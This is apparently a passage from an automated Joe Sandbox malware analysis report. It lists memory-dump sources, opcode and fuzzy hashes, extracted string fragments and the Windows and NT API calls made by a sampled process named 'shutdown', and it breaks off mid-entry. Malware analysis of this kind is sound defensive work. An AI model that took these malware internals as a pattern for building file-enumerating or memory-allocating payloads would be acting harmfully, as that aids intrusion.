                      • Opcode Fuzzy Hash: e9f81943950f7be1a9c74d3c12b5a93b01fd8dfa78f72b15e302fd764d19d8b2
                      • Instruction Fuzzy Hash: 5CF08271805208EBDB14DF64D841BDDBBB8EB04320F1083AAE9289B280E73597548B85
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_2f70000_zkhJmzWnNnFLoIoaAsyqpwQZ.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 02cca49e38662a387e86f34c886256fbfbf58bcc0c36bb4ecc6beab4d21673a2
                      • Instruction ID: 7704a75ad8feca310913460d5f75825a259c3752f99015870851a5e937d9e500
                      • Opcode Fuzzy Hash: 02cca49e38662a387e86f34c886256fbfbf58bcc0c36bb4ecc6beab4d21673a2
                      • Instruction Fuzzy Hash: 3BE06D762003047BE614EE98DC41E9B73ADEFC9710F004419FA08A7241C730B92087B5
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_2f70000_zkhJmzWnNnFLoIoaAsyqpwQZ.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 86803eb87e4fc5b44d4240ae7f49fe6d9c13e5943296b8ed037ecae9e4d22970
                      • Instruction ID: 3683a33926ca17287601652b76759ba1885df7f396ee19d5efeb4a805da5d0d8
                      • Opcode Fuzzy Hash: 86803eb87e4fc5b44d4240ae7f49fe6d9c13e5943296b8ed037ecae9e4d22970
                      • Instruction Fuzzy Hash: DFE0863660031837EA209999DD05F9BB79CCBCAE60F09017AFE0C9F340E670B94182F4
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_2f70000_zkhJmzWnNnFLoIoaAsyqpwQZ.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0044fbbb13ba3520ab1a2001248bbe84c6b3200bf22624e401764a4119efa709
                      • Instruction ID: 0abd46905dd76fefdda31937fa64192732fb0e69b5eff0021d009dbb5be5b8de
                      • Opcode Fuzzy Hash: 0044fbbb13ba3520ab1a2001248bbe84c6b3200bf22624e401764a4119efa709
                      • Instruction Fuzzy Hash: 47E04F362406047BD620EA59DC40F9BB76DEFC9711F004419FA096B241CB71B92286E1
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_2f70000_zkhJmzWnNnFLoIoaAsyqpwQZ.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: bac69761a18ce9bbc84759502088a51e9392f4a0446be54c5c5741532e706b1b
                      • Instruction ID: 64558788ad5612c339fc3ea6fb50817f433e14c6b652977575c8fb27768a3e24
                      • Opcode Fuzzy Hash: bac69761a18ce9bbc84759502088a51e9392f4a0446be54c5c5741532e706b1b
                      • Instruction Fuzzy Hash: 58B0925A8081C6665901B5A842CE4166E13144A210262088E1CA63E14AAA98A4316E83
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_2f70000_zkhJmzWnNnFLoIoaAsyqpwQZ.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                      • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                      • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                      • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                      • String ID: "$"$"$.$/$P$e$i$m$o$r$x
                      • String ID: D$\$e$e$i$l$n$r$r$w$x
                      • String ID: :$:$:$A$I$N$P$m$s$t
                      • String ID: :$:$:$A$I$N$P$m$s$t
                      • String ID: L$S$\$a$c$e$l
                      • String ID: %$+$2$G$Z$[$c
                      • String ID: F$P$T$f$r$x
                      • String ID: $i$l$o$u
                      • String ID: $e$k$o
                      • String ID: $e$h$o
                      • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                      • String ID: $e$h$o
                      • String ID: 2$3$3$5

                      Execution Graph

                      Execution Coverage:2.5%
                      Dynamic/Decrypted Code Coverage:3.4%
                      Signature Coverage:1.5%
                      Total number of Nodes:475
                      Total number of Limit Nodes:78
                      APIs
                      • FindFirstFileW.KERNELBASE(?,00000000), ref: 0324C324
                      • FindNextFileW.KERNELBASE(?,00000010), ref: 0324C35F
                      • FindClose.KERNELBASE(?), ref: 0324C36A
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2561298319.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3230000_shutdown.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$File$CloseFirstNext
                      • String ID:
                      • API String ID: 3541575487-0
                      • Opcode ID: eef4da17557448ca6832a932d7ade93aad66fc5e93c18e0207f45e7ff0ca740a
                      • Instruction ID: 78be85fda6ab5dd65ad9e1648470d1ce04b8a91cfeb6add3d419cb90ea107414
                      • Opcode Fuzzy Hash: eef4da17557448ca6832a932d7ade93aad66fc5e93c18e0207f45e7ff0ca740a
                      • Instruction Fuzzy Hash: B13178759103197BDB24EF64CC85FEF777C9F44B04F144558F909AB180E6B06AD58BA0
                      APIs
                      • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 032580F3
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2561298319.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3230000_shutdown.jbxd
                      Yara matches
                      Similarity
                      • API ID: CreateFile
                      • String ID:
                      • API String ID: 823142352-0
                      • Opcode ID: 54a4c731f85f314922f31301092951ec258779c6e92f03241f429952f0e43ebd
                      • Instruction ID: 3cc47008f9df08df514b80fef85ccbb43623002924fed6a925f25bf4b5a40244
                      • Opcode Fuzzy Hash: 54a4c731f85f314922f31301092951ec258779c6e92f03241f429952f0e43ebd
                      • Instruction Fuzzy Hash: 6231C1B5A11209AFCB04DF98D881EEFB7F9AF8D314F108219FD19A7240D770A951CBA5
                      APIs
                      • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 03258238
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2561298319.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3230000_shutdown.jbxd
                      Yara matches
                      Similarity
                      • API ID: FileRead
                      • String ID:
                      • API String ID: 2738559852-0
                      • Opcode ID: 5a5ca1f3219d6b66a543da58c95699784618ab15eaeb429c4cb0431a847574ee
                      • Instruction ID: 705f38e655bbb71963495bda1ae8dc379fe1ff3673c2ba90f7d8e975f6405c1e
                      • Opcode Fuzzy Hash: 5a5ca1f3219d6b66a543da58c95699784618ab15eaeb429c4cb0431a847574ee
                      • Instruction Fuzzy Hash: 573104B5A10209AFCB04DF99D881EEFB7B9EF8C314F108219FD09A7240D770A951CBA5
                      APIs
                      • NtAllocateVirtualMemory.NTDLL(03241E5E,?,03257097,00000000,00000004,00003000,?,?,?,?,?,03257097,03241E5E,?,03250AF1,03257097), ref: 032584DD
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2561298319.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3230000_shutdown.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocateMemoryVirtual
                      • String ID:
                      • API String ID: 2167126740-0
                      • Opcode ID: 7e87e8177d1e0f840cad00dcad60a18a42444f463050a49184e836b06b9d95c5
                      • Instruction ID: ddd0989f9b94025bcc05ef6b558f6ead3a61069d6dbd21ddf73b84344da59f6e
                      • Opcode Fuzzy Hash: 7e87e8177d1e0f840cad00dcad60a18a42444f463050a49184e836b06b9d95c5
                      • Instruction Fuzzy Hash: AA210AB5A10209AFDB14DF58DC81FEFB7A9EF89310F008109FD09A7240D771A951CBA5
                      APIs
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2561298319.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3230000_shutdown.jbxd
                      Yara matches
                      Similarity
                      • API ID: DeleteFile
                      • String ID:
                      • API String ID: 4033686569-0
                      • Opcode ID: efeccf29bc52bc84f90cd12cac055aaec4c922ac01c5b6e44b1802c59529b91c
                      • Instruction ID: 5acba0b529baa8d5813689f241773c0cda5feb00476aa49c2c52a3ba797fa8cd
                      • Opcode Fuzzy Hash: efeccf29bc52bc84f90cd12cac055aaec4c922ac01c5b6e44b1802c59529b91c
                      • Instruction Fuzzy Hash: 4D01C076621704BFD620EBA8DC41FAB73ACDF86710F104549FE199B180D7B17A50C7A2
                      APIs
                      • NtClose.NTDLL(03251151,?,00009E5D,E5B4FE69,?,03251151,E5B4FE69,?,?,?,?,?,?,?,?,00000000), ref: 03258307
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2561298319.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3230000_shutdown.jbxd
                      Yara matches
                      Similarity
                      • API ID: Close
                      • String ID:
                      • API String ID: 3535843008-0
                      • Opcode ID: 0044fbbb13ba3520ab1a2001248bbe84c6b3200bf22624e401764a4119efa709
                      • Instruction ID: 7047e3ac1d69525fb0ab68e192b23a0a488cdcf3cfaa36943472226d39a7adb3
                      • Opcode Fuzzy Hash: 0044fbbb13ba3520ab1a2001248bbe84c6b3200bf22624e401764a4119efa709
                      • Instruction Fuzzy Hash: C2E04F75240604BBD220EA59CC00F9BB76CEBC6751F008419FA0AAB241CA71BA5186E4
                      APIs
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: a34c70ea1242fe270806255e29f0a259658e8507b4d1c7230fbfe284e09d127e
                      • Instruction ID: b77917f754a632f11f0b4d5b70cdeefd56f3b3f825c10f597cbe2dc265ee026c
                      • Opcode Fuzzy Hash: a34c70ea1242fe270806255e29f0a259658e8507b4d1c7230fbfe284e09d127e
                      • Instruction Fuzzy Hash: 4990023161994412A140B1594888546404997E0301B55C015E0424554C8B158A565362
                      APIs
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 66c30fff003a0b2079499c130980c4125df70122aa2ca0fa8ddd2b7206a7d08a
                      • Instruction ID: 6d70d5cb77546cb26bafceaf629274e75d187482b00aba7c31f2a87ceb259ddc
                      • Opcode Fuzzy Hash: 66c30fff003a0b2079499c130980c4125df70122aa2ca0fa8ddd2b7206a7d08a
                      • Instruction Fuzzy Hash: 0F900261615644425140B1594808406604997E1301395C119A0554560C87198955926A
                      APIs
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 4e964da6ba945d9b08bf43441970b476a113b96433bd80fd64c3fc6cf7b6d2a5
                      • Instruction ID: b9a50f3711e9077626035d4ee99278ef58f89e484e7874b3f96e854d94e7681f
                      • Opcode Fuzzy Hash: 4e964da6ba945d9b08bf43441970b476a113b96433bd80fd64c3fc6cf7b6d2a5
                      • Instruction Fuzzy Hash: 6990023161954C02E150B1594418746004987D0301F55C015A0024654D87568B5576A2
                      APIs
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 0e9fd912f6a67e909cdbc01da87f99845d8c9767fc7e746586e4c29a1c1ff606
                      • Instruction ID: 99332dc8138ce153a33198dc0373b026f578ed92a572240ac72dc1a246b97a1c
                      • Opcode Fuzzy Hash: 0e9fd912f6a67e909cdbc01da87f99845d8c9767fc7e746586e4c29a1c1ff606
                      • Instruction Fuzzy Hash: 2390023121554C02E180B159440864A004987D1301F95C019A0025654DCB168B5977A2
                      APIs
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 2e7c587d0bafe054845700796d3f18ea2f8f28aff36e112b1fb8bb92eea07c93
                      • Instruction ID: 88079672beae60e27cb727295c0c74702cd1c97b7f5c0e527ea598b87406dced
                      • Opcode Fuzzy Hash: 2e7c587d0bafe054845700796d3f18ea2f8f28aff36e112b1fb8bb92eea07c93
                      • Instruction Fuzzy Hash: E390023121958C42E140B1594408A46005987D0305F55C015A0064694D97268E55B662
                      APIs
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: a6a1c758f8db942d93be0f7bb720f6c2f24a79f231431542bff81f36ac9268dd
                      • Instruction ID: d285faa72ea34043e841aac9ab0187761267f1666ca8729d2e38943d27e0ea0b
                      • Opcode Fuzzy Hash: a6a1c758f8db942d93be0f7bb720f6c2f24a79f231431542bff81f36ac9268dd
                      • Instruction Fuzzy Hash: 4E900261216544035105B1594418616404E87E0201B55C025E1014590DC62689916126
                      APIs
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 7dffcfad72f365600c543fcd83ca442ccb00454850cf8a49ad74529947f2d8f3
                      • Instruction ID: 3d2a128424eee80d3aa1078b1e5b7fc5bbdb93f5d2e4dcaf9701147a6a80e041
                      • Opcode Fuzzy Hash: 7dffcfad72f365600c543fcd83ca442ccb00454850cf8a49ad74529947f2d8f3
                      • Instruction Fuzzy Hash: D5900435335544031105F55D070C50700CFC7D5351355C035F1015550CD733CD715133
                      APIs
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: c6ac242c7091a8cebe3066bcb702d774396d72a88afe12b6684d79dc25e9b3ed
                      • Instruction ID: ab3c01159cb8aa2b67941f9bcee30c528bd7771be4606729984563e541a08b9e
                      • Opcode Fuzzy Hash: c6ac242c7091a8cebe3066bcb702d774396d72a88afe12b6684d79dc25e9b3ed
                      • Instruction Fuzzy Hash: BF900225235544021145F559060850B048997D6351395C019F1416590CC72289655322
                      APIs
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: fcd117ed6000242af1afb4bcb4896aead337ed17bc41925d910ba4cccc4ea392
                      • Instruction ID: ad3fae99a4365638a340a32ed309b6019e91e9dd26bf14fe2add51d85049016a
                      • Opcode Fuzzy Hash: fcd117ed6000242af1afb4bcb4896aead337ed17bc41925d910ba4cccc4ea392
                      • Instruction Fuzzy Hash: 4F900221615544425140B16988489064049ABE1211755C125A0998550D865A89655666
                      APIs
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 3742f99966de03e774aaa5eae18da0d946d52952cf0464ad081293e036cbcbb1
                      • Instruction ID: ccfb5e2e4363ca40977f363ebd4941e7dbe5d2fa0269d57652eefe31264813c6
                      • Opcode Fuzzy Hash: 3742f99966de03e774aaa5eae18da0d946d52952cf0464ad081293e036cbcbb1
                      • Instruction Fuzzy Hash: C7900221225D4442E200B5694C18B07004987D0303F55C119A0154554CCA1689615522
                      APIs
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 31c46bc738b9d10c798bdcf6c8fb7900d4cab593981fa3d44ba82bfc2d3fa855
                      • Instruction ID: 1c590cd79144b4244da2c392dfca20e2063f1b653b53ddee27f677f56957d75d
                      • Opcode Fuzzy Hash: 31c46bc738b9d10c798bdcf6c8fb7900d4cab593981fa3d44ba82bfc2d3fa855
                      • Instruction Fuzzy Hash: 0190026135554842E100B1594418B060049C7E1301F55C019E1064554D871ACD526127
                      APIs
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: b62f87764b79f734300bea37d493843bb65db4b5c998d1b5c1e9f34b17f202ea
                      • Instruction ID: 6ef5a734427a7db851825dac17b51051aebdcd73435c9968c18e291902a19116
                      • Opcode Fuzzy Hash: b62f87764b79f734300bea37d493843bb65db4b5c998d1b5c1e9f34b17f202ea
                      • Instruction Fuzzy Hash: 8C90022161554902E101B1594408616004E87D0241F95C026A1024555ECB268A92A132
                      APIs
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 5011a82fe51203e6ee4cf8c27e64f170c96474253bdc076612fff7302cc61f46
                      • Instruction ID: 2c6dea45e30a398889ec8d98b4d8e95308db8fc657c634c47c4b3b0a2f65e0d8
                      • Opcode Fuzzy Hash: 5011a82fe51203e6ee4cf8c27e64f170c96474253bdc076612fff7302cc61f46
                      • Instruction Fuzzy Hash: 9490026121594803E140B5594808607004987D0302F55C015A2064555E8B2A8D516136
                      APIs
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 83f7eb47499b23a71c785f69975a5a1ce8541b6b79ed6afd8637c0fbdbd2a4b1
                      • Instruction ID: 2efd78537e658bbd208abab4bc45f2861804c77e1be337775b4375513659a67c
                      • Opcode Fuzzy Hash: 83f7eb47499b23a71c785f69975a5a1ce8541b6b79ed6afd8637c0fbdbd2a4b1
                      • Instruction Fuzzy Hash: 4C900221256585526545F1594408507404A97E0241795C016A1414950C86279956D622
                      APIs
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 4cea1f784980aff276382f4971cadf80b3026d82517414fa1244da04160cb025
                      • Instruction ID: 76e4bb39f4264c978b462d6ec1be446e1c7fc559ab12eb0c435f837d12186876
                      • Opcode Fuzzy Hash: 4cea1f784980aff276382f4971cadf80b3026d82517414fa1244da04160cb025
                      • Instruction Fuzzy Hash: F290023121554813E111B1594508707004D87D0241F95C416A0424558D97578A52A122
                      APIs
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: e2d6652fbaba0f9498af12b74e0b19fecfb35e77658da66c79aa18520f6ea397
                      • Instruction ID: 474ec9ca598a6be11ccaea21e637a9e55605103ec44a0917493b611b74636efb
                      • Opcode Fuzzy Hash: e2d6652fbaba0f9498af12b74e0b19fecfb35e77658da66c79aa18520f6ea397
                      • Instruction Fuzzy Hash: 4590022922754402E180B159540C60A004987D1202F95D419A0015558CCA1689695322
                      APIs
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 1559b2fd704d47c78065b338e45a55bbbe09f88aca71693c1b3daa9eecc97276
                      • Instruction ID: 517c3c1f944d1c9c208c0c7cc0637bf511f749bf7c229b43a32132704ced77e9
